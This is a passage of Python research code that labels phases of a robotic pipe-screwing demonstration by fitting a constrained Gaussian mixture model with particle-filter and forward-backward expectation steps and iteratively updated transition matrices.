getlabels, plot_file , compute_success_rate\n\n\"\"\" --------------------------------------------------------------------------------------\n Global Constants\n-----------------------------------------------------------------------------------------\"\"\"\nNUM_RUNS = 25 #20 #it will run the gmm for this number-1\nn_primitives = 6 \nnumIterTrain = 20\nnumIterTest = 20\nnumTMatrixUpdates = 1\n\n\"\"\" --------------------------------------------------------------------------------------\n Utility Functions\n----------------------------------------------------------------------------------------\"\"\"\nclass Pr(enum.Enum): \n \"\"\" \n Enum associating each primitive with an integer \n \"\"\"\n none = 0\n fsm = 1\n align = 2\n engage = 3\n screw = 4\n tighten = 5\n\ndef sample_primitive(p):\n \"\"\" \n Selects the primitive with the highest associated probability\n Input:\n p: (6,) numpy array representing the probability of each primitive\n Output:\n integer between 0-5 corresponding to the selected primitive(2,)\n \"\"\"\n return bisect.bisect(np.cumsum(p), random.random())\n\ndef initializeTransitionMatrix2Identity():\n T = np.eye(n_primitives)\n return T\n\ndef initializeTransitionMatrix(final=False):\n \"\"\" \n Input:\n final: flag -> False for Training, True for Testing\n Output:\n array of size (6,6) containing conditional probabilities: T[pr_i|pr_j]\n \"\"\"\n if final:\n T = np.zeros((6,6)) # you can only move between specified primitives (more restrictive)\n else:\n T = np.ones((6,6)) # you can move from any primitive to any other\n # \n T[Pr.none.value, Pr.none.value] = 50\n T[Pr.none.value, Pr.fsm.value] = 1\n T[Pr.none.value, Pr.screw.value] = 1\n # T[Pr.none.value, Pr.fsm.value] = 0.05\n #\n T[Pr.fsm.value, Pr.fsm.value] = 50\n T[Pr.fsm.value, Pr.align.value] = 1\n # T[Pr.fsm.value, Pr.none.value] = 0.05\n #\n # T[Pr.align.value, Pr.fsm.value] = 0.0\n T[Pr.align.value, Pr.align.value] = 50\n # T[Pr.align.value, Pr.screw.value] = 0\n T[Pr.align.value, Pr.engage.value] = 1\n #\n T[Pr.engage.value, Pr.engage.value] = 50\n T[Pr.engage.value, Pr.none.value] = 1\n T[Pr.engage.value, Pr.screw.value] = 1\n # T[Pr.engage.value, Pr.tighten.value] = 0\n # T[Pr.engage.value, Pr.screw.value] = 0.1\n \n # T[Pr.screw.value, Pr.none.value] = 0.5\n T[Pr.screw.value, Pr.screw.value] = 50\n T[Pr.screw.value, Pr.none.value] = 1\n T[Pr.screw.value, Pr.tighten.value] = 1\n # T[Pr.screw.value, Pr.engage.value] = 0\n # T[Pr.screw.value, Pr.align.value] = 0\n\n T[Pr.tighten.value, Pr.tighten.value] = 50\n T[Pr.tighten.value, Pr.none.value] = 1\n # T[Pr.tighten.value, Pr.screw.value] = 0\n\n # scale values so they are all probabilities between 0-1\n T = np.transpose(T.transpose() / np.sum(T,axis=1))\n return T\n\ndef updateTransitionMatrix(currentNumUpdates):\n \"\"\" \n It reads the likelihood_run#.txt files\n\n Input:\n integer reprsenting the number of times the transition matrix has been updated \n Output:\n array of size (6,6) containing conditional probabilities: T[pr_i|pr_j]\n \"\"\"\n \n #if updatedT already existed from another run, just add them up and then divide by the number of runs\n T = np.zeros((6,6))\n Tnew = np.zeros((6,6))\n actualNumRuns = 0 \n\n for i in range(1, NUM_RUNS):\n # number of runs: 1-19 but missing 11 and 16 was shit\n if i == 11 or i == 16:\n continue\n \n actualNumRuns += 1\n\n # Read data\n likelihoodsFile=\"results/run{0:d}_likelihoods_T{1:d}\".format(i,currentNumUpdates)\n likelihoods = np.genfromtxt(likelihoodsFile)\n likelihoods = likelihoods[:,1:] #the first column is just time stamps\n\n # ------- Compute matrix entries\n # Find index of maximum value in each row of likelihoods. This index will match the primitive. \n primitivesSequence = np.argmax(likelihoods, axis=1)\n\n for j in range(primitivesSequence.shape[0] - 1):\n Tnew[primitivesSequence[j], primitivesSequence[j+1]] += 1\n\n # Add T matrices from each run and scale values so they are all probabilities between 0-1\n Tnew = np.transpose(Tnew.transpose() / np.sum(Tnew,axis=1))\n T = T + Tnew\n \n T = T/actualNumRuns\n\n return T\n\ndef initializeConstraints():\n myConstraints=[()]*n_primitives\n myConstraints[Pr.none.value] = (\n (var_idxs['vel_x'], 0.0, -1.0),\n (var_idxs['vel_y'], 0.0, -1.0),\n (var_idxs['vel_z'], 0.0, -1.0),\n (var_idxs['ang_vel_x'], 0.0, -1.0),\n (var_idxs['ang_vel_y'], 0.0, -1.0),\n (var_idxs['ang_vel_z'], 0.0, -1.0),\n (var_idxs['F_x'], 0.0, -1.0),\n (var_idxs['F_y'], 0.0, -1.0),\n (var_idxs['F_z'], 0.0, -1.0),\n (var_idxs['M_x'], 0.0, -1.0),\n (var_idxs['M_y'], 0.0, -1.0),\n (var_idxs['M_z'], 0.0, -1.0),\n )\n myConstraints[Pr.fsm.value] = (\n (var_idxs['M_x'], 0.0, -1.0),\n (var_idxs['M_y'], 0.0, -1.0),\n (var_idxs['M_z'], 0.0, -1.0)\n )\n myConstraints[Pr.align.value] = (\n (var_idxs['vel_x'], 0.0, -1.0),\n (var_idxs['vel_y'], 0.0, -1.0),\n (var_idxs['vel_z'], 0.0, -1.0),\n (var_idxs['ang_vel_z'], 0.0, 0.5),\n )\n myConstraints[Pr.engage.value] = (\n (var_idxs['ori_x'], 0.0, 0.5),\n (var_idxs['ori_y'], 0.0, 0.5),\n (var_idxs['vel_x'], 0.0, -1.0),\n (var_idxs['vel_y'], 0.0, -1.0),\n (var_idxs['vel_z'], 0.0, -1.0),\n (var_idxs['ang_vel_x'], 0.0, -1.0),\n (var_idxs['ang_vel_y'], 0.0, -1.0)\n )\n myConstraints[Pr.screw.value] = (\n (var_idxs['vel_x'], 0.0, -1.0),\n (var_idxs['vel_y'], 0.0, -1.0),\n (var_idxs['vel_z'], 0.0, -1.0),\n (var_idxs['ang_vel_x'], 0.0, -1.0),\n (var_idxs['ang_vel_y'], 0.0, -1.0),\n )\n myConstraints[Pr.tighten.value] = (\n (var_idxs['vel_x'], 0.0, -1.0),\n (var_idxs['vel_y'], 0.0, -1.0),\n (var_idxs['vel_z'], 0.0, -1.0),\n (var_idxs['ang_vel_x'], 0.0, -1.0),\n (var_idxs['ang_vel_y'], 0.0, -1.0),\n (var_idxs['ang_vel_z'], 0.0, 0.5)\n )\n return myConstraints\n\ndef mixWithIdentity(T,alpha):\n return alpha*np.eye(T.shape[0]) + (1 - alpha)*T\n\ndef forward_model_primitive(s_value, T):\n #s is a primitve idx\n #T is the transition matrix\n return sample_primitive(T[s_value])\n\ndef gaussian(X, mu, cov):\n return scipy.stats.multivariate_normal.pdf(X, mean=mu, cov=cov)\n\ndef mix_mean_covar_pi(mean,covar,pi,mean0,covar0,pi0,k):\n np.save(mean, np.load(mean)*(1 - k) + k*np.load(mean0))\n np.save(covar, np.load(covar)*(1 - k) + k*np.load(covar0))\n np.save(pi, np.load(pi)*(1 - k) + k*np.load(pi0))\n\ndef createFileNames(run_number, currentNumTupdates):\n likelihoods_fileName = \"results/run{0:d}_likelihoods_T{1:d}\".format(run_number, currentNumTupdates)\n tlabels_fileName = \"results/run{0:d}_tlabels_T{1:d}\".format(run_number, currentNumTupdates)\n prmlabels_fileName = \"results/run{0:d}_prmlabels_T{1:d}\".format(run_number, currentNumTupdates)\n manual_tlabels = \"../data/pipe/raw_pipe/run{0:d}_tlabels\".format(run_number)\n manual_prmlabels = \"../data/pipe/raw_pipe/run{0:d}_prmlabels\".format(run_number)\n success_fileName = \"results/run{0:d}_successRates\".format(run_number)\n failureFile = \"results/run{0:d}_failures_T{1:d}\".format(run_number, currentNumTupdates)\n return likelihoods_fileName, tlabels_fileName, prmlabels_fileName, manual_tlabels, manual_prmlabels, success_fileName, failureFile\n\ndef createSuccessRateFile(run_number, currentNumTupdates):\n \"\"\"\n Saves the success rates for a give run\n Each row corresponds to an updated transition matrix\n \"\"\"\n successRate_fileName = \"results/run{0:d}_successRates\".format(run_number)\n successRate_file = open(successRate_fileName,\"w\")\n successRate_file.write(\"Tmatrix # \\t SuccessRate\\n\")\n successRate_file.close()\n\ndef saveSuccessRateFile(fileName, successRate, currentNumTupdates):\n successRate_file = open(fileName,\"a\")\n successRate_file.write((\"{:d} \\t\\t\\t {:.4e}\\n\").format(currentNumTupdates, successRate))\n successRate_file.close()\n\n\"\"\" --------------------------------------------------------------------------------------\n Gaussian Mixture Model Class \n-----------------------------------------------------------------------------------------\"\"\"\nclass GMM:\n def __init__(self, X, offset=0.0):\n self.X = X;\n self.epoch = 0;\n self.offset = offset\n \n def initialize_clusters(self, n_clusters, constraints=None, means0=None, cov0=None):\n \"\"\"\n Each cluster is a primitive\n \"\"\"\n self.clusters = []\n self.n_clusters = n_clusters\n idx = np.arange(X.shape[0])\n \n # We could use the KMeans centroids to initialise the GMM\n # Or we can prescribe them\n if means0 is not None:\n if means0.shape[0] != n_clusters or means0.shape[1] != self.X.shape[1]:\n print(\"means not the correct shape\")\n exit()\n mu_k = means0;\n else:\n kmeans = KMeans().fit(X)\n mu_k = kmeans.cluster_centers_\n if constraints is not None:\n self.constraints = True\n else:\n self.constraints = False\n\n self.likelihoods = np.zeros((X.shape[0], n_clusters))\n for i in range(n_clusters):\n if cov0 is not None:\n cov_k = cov0[i]\n else:\n cov_k = np.identity(self.X.shape[1], dtype=np.float64)\n self.clusters.append({\n 'pi_k': 1.0 / n_clusters,\n 'mu_k': mu_k[i],\n 'cov_k': cov_k\n })\n self.likelihoods[:,i] = 1.0/n_clusters\n if self.constraints:\n self.clusters[i]['constraint_k'] = constraints[i]\n return self.clusters\n \n def initialize_clusters_from_savedfiles(self, n_clusters, meanfile,covfile,pifile, constraints=None):\n \"\"\"\n Each cluster is a primitive\n \"\"\"\n self.clusters = []\n self.n_clusters = n_clusters\n mu_k = np.load(meanfile)\n cov_k = np.load(covfile)\n pi_k = np.load(pifile)\n if constraints is not None:\n self.constraints = True\n else:\n self.constraints = False\n self.likelihoods = np.zeros((X.shape[0], n_clusters))\n for i in range(n_clusters):\n self.clusters.append({\n 'pi_k': pi_k[i],\n 'mu_k': mu_k[i],\n 'cov_k': 2.0*cov_k[i]\n })\n if self.constraints:\n self.clusters[i]['constraint_k'] = constraints[i]\n return self.clusters\n\n def inflate_cov(self, factor):#each cluster is a primitive\n for cluster in self.clusters:\n cluster['cov_k'] = factor*cluster['cov_k']\n\n def expectation_step(self,run_number, t=None, saveFigure = None, saveFile=None,T_matrix_APF=None, T_matrix_standard=None):\n \"\"\"\n - Output: computes p(belong to primitive | X) for each X\n It saves these likelihoods to a .txt\n - Uses: a particle filter with a heuristic forward model: T(sn | sn-1) \n \"\"\"\n plotFlag = t is not None and saveFigure is not None\n if plotFlag:\n f,ax = plt.subplots(1)\n if T_matrix_APF is not None:\n self.apf_expectation(T_matrix_APF) #the option that worked best\n elif T_matrix_standard is not None:\n self.forward_backward_expectation(T_matrix_standard)\n else:\n self.standard_expectation()\n if plotFlag:\n for kk, cluster in enumerate(self.clusters):\n ax.plot(t,cluster['gamma_nk'],label=Pr(kk))\n if plotFlag:\n ax.legend()\n ax.set_title(\"Primitive Probabilities Run{0:d}\".format(run_number))\n plt.savefig(saveFigure, dpi=600)\n plt.close()\n # plt.show()\n self.epoch += 1\n # Save likelihoods to txt file:\n if saveFile is not None:\n likelihoods = np.zeros((len(t), self.n_clusters + 1))\n likelihoods[:,0] = t\n for kk, cluster in enumerate(self.clusters):\n likelihoods[:,kk+1] = cluster['gamma_nk']\n np.savetxt(saveFile, likelihoods)\n \n def standard_expectation(self):\n totals = np.zeros(self.X.shape[0], dtype=np.float64)\n for kk, cluster in enumerate(self.clusters):\n gamma_nk = (cluster['pi_k'] * gaussian(self.X, cluster['mu_k'], cluster['cov_k'])).astype(np.float64)\n totals += gamma_nk\n cluster['gamma_nk'] = gamma_nk \n self.totals = totals\n for kk, cluster in enumerate(self.clusters):\n for i in range(len(totals)):\n if totals[i] == 0.0:\n cluster['gamma_nk'][i] = 1.0 / self.n_clusters\n totals[i] = 1e-300\n else:\n cluster['gamma_nk'][i] /= totals[i];\n self.likelihoods[:,kk] = cluster['gamma_nk']\n\n def forward_backward_expectation(self,T_matrix):\n N = self.X.shape[0]\n alpha = np.zeros((self.n_clusters, N))\n beta = np.zeros((self.n_clusters, N))\n p_obs = np.zeros((self.n_clusters, N)) + self.offset\n for k, cluster in enumerate(self.clusters):\n p_obs[k,:] = gaussian(self.X, cluster['mu_k'], cluster['cov_k']).astype(np.float64)\n alpha[k,0] = 1.0/self.n_clusters*p_obs[k,0]#gaussian(self.X[0], cluster['mu_k'], cluster['cov_k']).astype(np.float64)\n beta[k,-1] = 1.0\n alpha[:,0] = alpha[:,0] / np.sum(alpha[:,0])\n for t in range(1,N):\n for k1 in range(self.n_clusters):\n for k0 in range(self.n_clusters):\n alpha[k1, t] += alpha[k0, t-1]*T_matrix[k0, k1]\n alpha[k1,t] *= p_obs[k1,t]#gaussian(self.X[t+1], cluster1['mu_k'], cluster1['cov_k']).astype(np.float64)\n alpha[:,t] = alpha[:,t] / np.sum(alpha[:,t])\n for t in range(N - 2, -1, -1):\n for k0 in range(self.n_clusters):\n for k1 in range(self.n_clusters):\n beta[k0, t] += beta[k1,t+1] * T_matrix[k0, k1] * p_obs[k1, t+1]#gaussian(self.X[t+1], cluster1['mu_k'], cluster1['cov_k']).astype(np.float64)\n beta[:,t] = beta[:,t] / np.sum(beta[:,t])\n self.totals = np.zeros(N)\n for k, cluster in enumerate(self.clusters):\n cluster['gamma_nk'] = alpha[k,:]*beta[k,:]\n self.totals += cluster['gamma_nk']\n for k, cluster in enumerate(self.clusters):\n cluster['gamma_nk'] /= self.totals\n self.offset = max(self.offset*0.5, 0.1)\n \n def pf_expectation(self,T_forward):\n \"\"\" \n Input:\n observations: states Starting from T=1\n pose_0: (4,4) numpy arrays, starting pose\n Output:\n p_primitives (N x n_primtives probability array)\n \"\"\"\n N = self.X.shape[0]\n likelihoods = np.zeros((self.X.shape[0], self.n_clusters))\n self.totals = np.zeros(self.X.shape[0])\n for kk, cluster in enumerate(self.clusters):\n likelihoods[0,kk] = (cluster['pi_k'] * gaussian(self.X[0], cluster['mu_k'], cluster['cov_k'])).astype(np.float64)\n self.totals[0] = np.sum(likelihoods[0,:])\n likelihoods[0,:] /= np.sum(likelihoods[0,:])\n N_particles = 100;\n #store primitives as integers\n s = np.zeros((N_particles,N),dtype=int)\n for i in range(N_particles):\n s[i,0] = sample_primitive(likelihoods[0])\n weights = np.ones(N_particles)\n ps = np.zeros(self.n_clusters)\n for t in range(N-1):\n for kk, cluster in enumerate(self.clusters):\n ps[kk] = (cluster['pi_k'] * gaussian(self.X[t+1], cluster['mu_k'], cluster['cov_k'])).astype(np.float64)\n for i in range(N_particles):\n s[i,t+1]=forward_model_primitive(s[i,t])\n weights[i] = ps[s[i,t+1]]\n #normalize weights\n weights = weights / np.sum(weights)\n #resample\n rand_offset = np.random.rand()\n cumweights = np.cumsum(weights)\n averageweight = cumweights[-1]/N_particles\n n_particles_allocated = 0\n for i, cumweight in enumerate(cumweights):\n n = int(np.floor(cumweight / averageweight - rand_offset)) + 1 #n particles that need to be allocated\n # print(n_particles_allocated, n)\n for particle in range(n_particles_allocated, n):\n s[particle,t+1] = s[i,t+1]\n n_particles_allocated = n\n #count primtivies\n temp = collections.Counter(s[:,t+1])\n for kk in range(self.n_clusters):\n likelihoods[t+1, kk] = temp[kk]/N_particles\n self.totals[t+1] = np.sum(ps)\n for kk, cluster in enumerate(self.clusters):\n cluster['gamma_nk'] = likelihoods[:,kk]\n\n def apf_expectation(self,T_forward):\n \"\"\" \n auxiliary particle filter: https://people.maths.bris.ac.uk/~manpw/apf_chapter.pdf\n Input:\n observations: states Starting from T=1\n pose_0: (4,4) numpy arrays, starting pose\n Output:\n p_primitives (N x n_primtives probability array)\n \"\"\"\n N = self.X.shape[0]\n likelihoods = np.zeros((self.X.shape[0], self.n_clusters))\n self.totals = np.zeros(self.X.shape[0])\n for kk, cluster in enumerate(self.clusters):\n likelihoods[0,kk] = (cluster['pi_k'] * gaussian(self.X[0], cluster['mu_k'], cluster['cov_k'])).astype(np.float64)\n self.totals[0] = np.sum(likelihoods[0,:])\n likelihoods[0,0] = 1e10\n likelihoods[0,:] /= np.sum(likelihoods[0,:])\n N_particles = 100;\n #store primitives as integers\n s = np.zeros((N_particles,N),dtype=int)\n for i in range(N_particles):\n s[i,0] = sample_primitive(likelihoods[0])\n weights = np.ones(N_particles)\n alpha = np.zeros(N_particles)\n ps = np.zeros(self.n_clusters)\n p_x1_for_s1 = np.zeros(self.n_clusters)\n for t in range(N-1):\n for s1, cluster1 in enumerate(self.clusters):\n p_x1_for_s1[s1] = (gaussian(self.X[t+1], cluster1['mu_k'], cluster1['cov_k'])).astype(np.float64)\n for s0, cluster0 in enumerate(self.clusters):\n ps[s0] = 0.0\n for s1, cluster1 in enumerate(self.clusters):\n ps[s0] += T_forward[s0,s1]*(p_x1_for_s1[s1] + self.offset)\n # print(\"t: {0:f}, ps\".format(t), ps)\n for i in range(N_particles):\n weights[i] = ps[s[i,t]]\n self.totals[t+1] = np.max(weights)\n #normalize weights\n weights = weights / np.sum(weights)\n #resample\n rand_offset = np.random.rand()\n cumweights = np.cumsum(weights)\n averageweight = cumweights[-1]/N_particles\n n_particles_allocated = 0\n for i, cumweight in enumerate(cumweights):\n n = int(np.floor(cumweight / averageweight - rand_offset)) + 1 #n particles that need to be allocated\n for particle in range(n_particles_allocated, n):\n s[particle,t] = s[i,t]\n alpha[particle] = alpha[i]\n n_particles_allocated = n\n #finished resample\n for i in range(N_particles):\n s[i,t+1]=forward_model_primitive(s[i,t],mixWithIdentity(T_forward,alpha[i]))\n #count primtivies\n temp = collections.Counter(s[:,t])\n for kk in range(self.n_clusters):\n likelihoods[t, kk] = temp[kk]/N_particles\n self.totals[0] = self.totals[1]\n temp = collections.Counter(s[:,-1])\n for kk, cluster in enumerate(self.clusters):\n likelihoods[-1,kk] = temp[-1]/N_particles\n cluster['gamma_nk'] = likelihoods[:,kk]\n self.offset = max(self.offset*0.5, 0.1)\n\n def maximization_step(self):\n \"\"\"\n Gaussian: p ( X| s , mu , cov ) \n Optimize mu , cov max likelihood\n Heuristic constraints on mu , cov\n \"\"\"\n N = float(self.X.shape[0])\n \n for kk, cluster in enumerate(self.clusters):\n gamma_nk = cluster['gamma_nk']\n cov_k = np.zeros((self.X.shape[1], self.X.shape[1]))\n \n N_k = np.sum(gamma_nk, axis=0) #sum over all the data\n \n pi_k = N_k / N #weights basd on total sums\n mu_k = np.sum(np.tile(gamma_nk,(self.X.shape[1],1)).transpose() * self.X, axis=0) / N_k #means are a weighted sum based on expectation\n if self.constraints:\n for constraint in cluster['constraint_k']:\n if constraint[0] > -1: #constraint[0] = -1 is used for inactive constraints\n mu_k[constraint[0]] = constraint[1]\n for j in range(self.X.shape[0]):\n diff = (self.X[j] - mu_k).reshape(-1, 1)\n cov_k += gamma_nk[j] * np.dot(diff, diff.T)\n if self.constraints:\n for constraint in cluster['constraint_k']:\n if constraint[0] > -1: #constraint[0] = -1 is used for inactive constraints\n if constraint[2] > 0: # covar constraint active:\n scalefactor = constraint[2]/np.sqrt(cov_k[constraint[0],constraint[0]])\n if scalefactor < 1:\n cov_k[constraint[0],:] = scalefactor*cov_k[constraint[0],:]\n cov_k[:,constraint[0]] = scalefactor*cov_k[:,constraint[0]]\n\n cov_k /= N_k\n \n cluster['pi_k'] = pi_k\n cluster['mu_k'] = mu_k\n cluster['cov_k'] = cov_k\n\n def get_likelihood(self):\n sample_likelihoods = np.log(self.totals)\n return np.sum(sample_likelihoods)\n\n def save(self, meanfile, covarfile, pifile):\n \"\"\"\n Save binaries\n \"\"\"\n mu0 = np.zeros((self.n_clusters,self.X.shape[1]))\n cov0 = np.zeros((self.n_clusters,self.X.shape[1],self.X.shape[1]))\n pi0 = np.zeros(self.n_clusters)\n for kk, cluster in enumerate(self.clusters):\n mu0[kk] = cluster['mu_k']\n cov0[kk] = cluster['cov_k']\n pi0[kk] = cluster['pi_k']\n np.save(meanfile,mu0)\n np.save(covarfile, cov0)\n np.save(pifile,pi0)\n\n def manual_labelling(self):\n \"\"\"---------------------\n Manual Labelling\n ------------------------\"\"\"\n # By manually labelling 1 run of data we extract a mean and cov to begin the iterations\n print(\"-------> manual labelling of run1 \")\n mu0 = np.zeros((n_primitives,N))\n cov0 = np.zeros((n_primitives,N,N))\n tlabels = np.genfromtxt(\"../data/pipe/raw_pipe/run1_tlabels\",dtype=float)\n tlabels = np.insert(tlabels,0,0.0)\n labels=[Pr(int(idx)) for idx in np.genfromtxt(\"../data/pipe/raw_pipe/run1_prmlabels\")]\n for prim in [Pr.none, Pr.fsm, Pr.align, Pr.engage, Pr.screw, Pr.tighten]:\n tpairs = []\n for i in range(len(labels)):#collect different labels and time periods corresponding to this primitive\n if(labels[i] == prim):\n tpairs.append([tlabels[i],tlabels[i+1]])\n time, X = read_data1('../data/pipe/raw_pipe/run1', \n '../data/pipe/raw_pipe/bias.force',\n output_fmt='array',\n tpairlist=tpairs)\n #each row of X is an observation\n #each column of X is a variable\n mu0[prim.value] = np.mean(X[:,subset],axis=0)\n cov0[prim.value] = np.cov(X[:,subset],rowvar=False)\n return mu0,cov0\n\n def train(self, mu0, cov0, numIterTrain, transition, currentNumTupdates, time):\n \"\"\"---------------------\n Training\n ------------------------\"\"\" \n # Init \n likelihoods_fileName, tlabels_fileName, prmlabels_fileName, manual_tlabels, manual_prmlabels, success_fileName, failureFile = createFileNames(1,currentNumTupdates) \n self.initialize_clusters(n_primitives, means0=mu0, cov0=cov0, constraints=myConstraints)\n run = 1\n\n # Train by running gmm for \"run1\" of the demonstration data \n print(\"-------> training run1 \")\n for i in range(numIterTrain):\n if i == numIterTrain - 1: # save and plot likelihoods on the last iteration\n likelihoods_figName = \"figures/run1_likelihoods_epochs{0:d}_T{1:d}.png\".format(self.epoch, currentNumTupdates)\n self.expectation_step(\n run,\n t=time,\n # saveFigure = likelihoods_figName, \n saveFile=likelihoods_fileName,\n T_matrix_APF=transition)\n else: # T_matrix_APF implies that the expectation step is using an Augmented Particle Filter\n self.expectation_step(run, t=time, T_matrix_APF=transition)\n self.maximization_step()\n print(\"it: {0:d} likelihood function {1:e}\".format(i, self.get_likelihood()))\n \n # Save training data\n self.save('references/mean', 'references/covar', 'references/pi')\n\n # Print training results\n means = np.load('references/mean.npy')\n covar = np.load('references/covar.npy')\n \n # Save tlabels and prmlabels from likelihoods files \n getlabels(likelihoods_fileName, tlabelFile=tlabels_fileName, prlabelFile=prmlabels_fileName)\n \n # Compute. save and plot success rate\n success_rate = compute_success_rate(likelihoods_fileName, manual_tlabels, manual_prmlabels)\n saveSuccessRateFile(success_fileName, success_rate, currentNumTupdates)\n print(\"-------> training success_rate run1: {0:f}\".format(success_rate))\n \n\n def test(self, run_number, numIterTest, transition, currentNumTupdates, time):\n \"\"\"---------------------\n Testing\n ------------------------\"\"\"\n \"\"\" \n The following code will run iff you specify a run number on command line:\n python gmm.py [run_number]\n\n *note: a run is the raw sensor data corresponding to \n one human demonstration of the full task\n \"\"\"\n offset = 0.01\n success = False\n likelihoods_fileName, tlabels_fileName, prmlabels_fileName, manual_tlabels, manual_prmlabels, success_fileName, failureFile = createFileNames(run_number,currentNumTupdates)\n\n # Testing\n print(\"-------> testing on: \",testfile, \"-----------\")\n while not success and offset < 10000:\n success = True\n offset = offset*10\n print(\"offset: \", offset)\n self.offset = offset\n try:\n self.initialize_clusters_from_savedfiles(n_primitives, \n 'references/mean.npy', 'references/covar.npy', 'references/pi.npy',constraints=myConstraints)\n for i in range(numIterTest):\n if i == numIterTest - 1: # save and plot likelihoods on the last iteration\n likelihoods_figName = \"figures/run{0:d}_likelihoods_epochs{1:d}_T{2:d}.png\".format(run_number, self.epoch, currentNumTupdates)\n self.expectation_step(\n run_number,\n t=time,\n # saveFigure = likelihoods_figName,\n saveFile = likelihoods_fileName,\n T_matrix_APF=transition)\n else:\n self.expectation_step(run_number, t=time, T_matrix_APF=transition, saveFile = likelihoods_fileName)\n \n self.maximization_step()\n print(\"it: {0:d} likelihood function {1:e}\".format(i, self.get_likelihood()))\n \n except Exception as e:\n print(\"error: \", e)\n success = False\n\n # Save testing data\n self.save('references/meantest', 'references/covartest', 'references/pitest')\n\n # Print testing results\n means = np.load('references/meantest.npy')\n covar = np.load('references/covartest.npy')\n \n # Save tlabels and prmlabels from likelihoods files \n getlabels(likelihoods_fileName, tlabelFile=tlabels_fileName, prlabelFile=prmlabels_fileName)\n \n # # Compute, save and plot success rate\n # success_rate = compute_success_rate(likelihoods_fileName, manual_tlabels, manual_prmlabels)\n # saveSuccessRateFile(success_fileName, success_rate, currentNumTupdates)\n # print(\"-------> testing success_rate run{0:d}: {1:f}\".format(run_number, success_rate))\n \n\n\"\"\" --------------------------------------------------------------------------------------\n MAIN\n-----------------------------------------------------------------------------------------\"\"\"\n\"\"\" \n - Initialize:\n * create an array \"subset\" with the raw sensor data of interest\n * manually label one run (data from one human demo of the whole task) and extract \n a mean and cov based on the manual labelling to seed the gmm algorithm\n - Training:\n * train by running the gmm on run1 using the mean and cov from the \n manual labelling as seeds\n - Testing:\n * test on other runs using the mean and cov from the training as seeds \n\"\"\"\nif __name__ == \"__main__\":\n\n # Dictionary for the raw sensor data\n var_idxs = { \n 'pos_x' : 0,\n 'pos_y' : 1,\n 'pos_z' : 2,\n 'ori_x' : 3,\n 'ori_y' : 4,\n 'ori_z' : 5,\n 'vel_x' : 6,\n 'vel_y' : 7,\n 'vel_z' : 8,\n 'ang_vel_x' : 9,\n 'ang_vel_y' : 10,\n 'ang_vel_z' : 11,\n 'F_x' : 12,\n 'F_y' : 13,\n 'F_z' : 14,\n 'M_x' : 15,\n 'M_y' : 16,\n 'M_z' : 17}\n\n # subset contains only the sensor data we are interested in: 3,4,6-17\n subset = np.hstack((np.arange(3, 5), np.arange(6,18)))\n \n # Reorder the dictionary according to data in subset\n for key, val in var_idxs.items():\n found_idxs = np.where(subset==val)[0]\n if found_idxs.size > 0:\n var_idxs[key] = found_idxs[0]\n else:\n var_idxs[key] = -1 # assign -1 in dictionary to the data that wasn't included in subset\n\n N = len(subset)\n\n \"\"\"\n TRAINING AND TESTING\n -- Labelling and training will run if and only if you don't pass any run numbers\n otherwise it will just test\n -- Cycle: \n 1) Manually label run1 to get mu0,cov0\n 2) Train on run1 using mu0, cov0 as seeds\n 3) Test on the rest of the runs\n 4) Update Transition Matrix based on all the labelled runs\n 5) Train on 1 and Test on the rest again\n 6) Repeat steps 4 and 5 for several iterations until labelling success wrt manually labelled runs improves\n \"\"\"\n myConstraints = initializeConstraints()\n\n for i in range(numTMatrixUpdates):\n\n # ------------------------\n # Train on run 1 \n # ------------------------\n time,X = read_data1('../data/pipe/raw_pipe/run1', \n output_fmt='array')#,t0=0.0, t1 = 18.0) #0 to 10.5 for cap\n \n # Init\n myGMM = GMM(X[:,subset])\n \n if i == 0:\n transition = initializeTransitionMatrix()\n # transition = initializeTransitionMatrix2Identity()\n # createSuccessRateFile(1,i)\n else: \n transition = updatedTransition\n\n # Run training gmm\n print(\">>>>>>>> TRAINING >>>>>>>>\")\n mu0,cov0 = myGMM.manual_labelling()\n myGMM.train(mu0, cov0, numIterTrain, transition, i, time)\n \n # --------------------------\n # Test on runs 2-19 \n # --------------------------\n for run_number in range(2, NUM_RUNS):\n \n # for the cap: run 11 is missing and 16 is shit\n # if run_number == 11 or run_number == 16:\n # continue\n testfile='../data/pipe/raw_pipe/run{0:d}'.format(run_number)\n time,X = read_data1(testfile, '../data/pipe/raw_pipe/bias.force',output_fmt='array')\n \n # Init\n mytestGMM = GMM(X[:,subset])\n \n if i == 0:\n transition = initializeTransitionMatrix(final=True)\n # transition = initializeTransitionMatrix2Identity()\n np.savetxt(\"transitions/T_0\", transition) \n # createSuccessRateFile(run_number,i)\n\n else: \n transition = updatedTransition\n\n # Run testing gmm\n print(\">>>>>>>> TESTING >>>>>>>>\") \n mytestGMM.test(run_number, numIterTest, transition, i, time)\n\n # Update Transition Matrix\n updatedTransition = updateTransitionMatrix(i) \n print(\">>>>>>>> T matrix Update #\"+str(i+1))\n tnum = i+1\n transitionFileName = \"transitions/T_{0:d}\".format(tnum)\n np.savetxt(transitionFileName, updatedTransition) \n\n \"\"\"\n FIGURES\n -- likelihood plots are created and saved inside \n the expectation_step called by train and test\n \"\"\"\n print(\">>>>>>>> PLOTS >>>>>>>>\")\n \n # ----------------------------------\n # Plot sensor data of labelled run \n # - for initial and final transition matrix\n # - for run2 (really good) and run12 (sucks)\n # - 4 plots \n lastT = numTMatrixUpdates - 1\n run2plot = [2, 12]\n # trans2plot = [0,lastT]\n trans2plot = 0\n\n for i in range(2): \n plot_file('../data/pipe/raw_pipe/run{0:d}'.format(run2plot[i]),\n tlabelfile=\"results/run{0:d}_tlabels_T{1:d}\".format(run2plot[i],trans2plot),\n prlabelfile=\"results/run{0:d}_prmlabels_T{1:d}\".format(run2plot[i],trans2plot)\n )\n plt.savefig(\"figures/labelled_run{0:d}_T{1:d}.png\".format(run2plot[i],trans2plot),dpi=600)\n # plt.show()\n plt.close()\n\n # for i in range(2): \n # for t in range(2):\n # plot_file('../data/pipe/raw_pipe/run{0:d}'.format(run2plot[i]),\n # tlabelfile=\"results/run{0:d}_tlabels_T{1:d}\".format(run2plot[i],trans2plot[t]),\n # prlabelfile=\"results/run{0:d}_prmlabels_T{1:d}\".format(run2plot[i],trans2plot[t]),\n # tlabelfileTruth='../data/pipe/raw_pipe/run{0:d}_tlabels'.format(run2plot[i]),\n # prlabelfileTruth='../data/pipe/raw_pipe/run{0:d}_prmlabels'.format(run2plot[i])\n # )\n # plt.savefig(\"figures/labelled_run{0:d}_T{1:d}.png\".format(run2plot[i],trans2plot[t]),dpi=600)\n # # plt.show()\n # plt.close()\n\n # # ----------------------------------\n # # Plot success_rate vs. #Tmatrix_updates 